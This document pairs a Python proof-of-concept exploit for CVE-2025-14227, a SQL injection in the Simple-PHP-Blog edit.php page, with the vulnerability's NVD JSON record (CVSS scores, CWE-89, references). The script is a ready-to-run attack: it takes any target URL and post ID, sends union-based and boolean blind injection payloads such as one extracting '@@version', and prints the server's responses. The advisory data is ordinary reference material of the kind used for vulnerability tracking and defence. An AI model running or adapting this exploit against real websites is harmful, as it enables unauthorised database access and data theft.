CVE-2025-14227

import requests import sys # CVE-2025-14227 PoC - SQL Injection in Philipinho Simple-PHP-Blog /edit.php # Target: Simple-PHP-Blog <= 94b5d3e57308bce5dfbc44c3edafa9811893d958 def exploit_sqli(target_url, post_id, payload): """ Exploit SQL injection vulnerability in edit.php Args: target_url: Base URL of the vulnerable application post_id: ID of the post to edit payload: SQL injection payload Returns: Server response """ endpoint = f"{target_url}/edit.php" # Prepare the malicious request data = { 'id': post_id, 'title': 'test', 'content': payload # SQL injection payload in content field } try: response = requests.post(endpoint, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" def union_based_sqli(target_url, post_id): """ Example: Union-based SQL injection to extract database version """ # Payload to extract database version via union injection payload = "' UNION SELECT 1,2,@@version,4,5-- -" return exploit_sqli(target_url, post_id, payload) def blind_sqli(target_url, post_id): """ Example: Boolean-based blind SQL injection """ # Payload to test for blind SQL injection payload = "' AND 1=1-- -" return exploit_sqli(target_url, post_id, payload) if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14227-poc.py <target_url> <post_id>") print("Example: python cve-2025-14227-poc.py http://localhost/simple-php-blog 1") sys.exit(1) target = sys.argv[1] post_id = sys.argv[2] print(f"[*] Testing CVE-2025-14227 on {target}") print(f"[*] Target post ID: {post_id}") # Test blind SQL injection print("\n[*] Testing boolean-based blind SQL injection...") result = blind_sqli(target, post_id) print(f"[+] Response length: {len(result)}") # Test union-based SQL injection print("\n[*] Testing union-based SQL injection...") result = union_based_sqli(target, post_id) print(f"[+] Response: {result[:500]}...")

{"cve": {"id": "CVE-2025-14227", "sourceIdentifier": "[email protected]", "published": "2025-12-08T10:16:00.847", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958. This issue affects some unknown processing of the file /edit.php. The manipulation results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:philipinho:simple-php-blog:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-01-22", "matchCriteriaId": "9EB06D3E-88B7-4FF6-BEEB-1CF2C23A55B5"}]}]}], "references": [{"url": "https://github.com/woshinenbaba/CVE-/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334669", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334669", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.701826", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}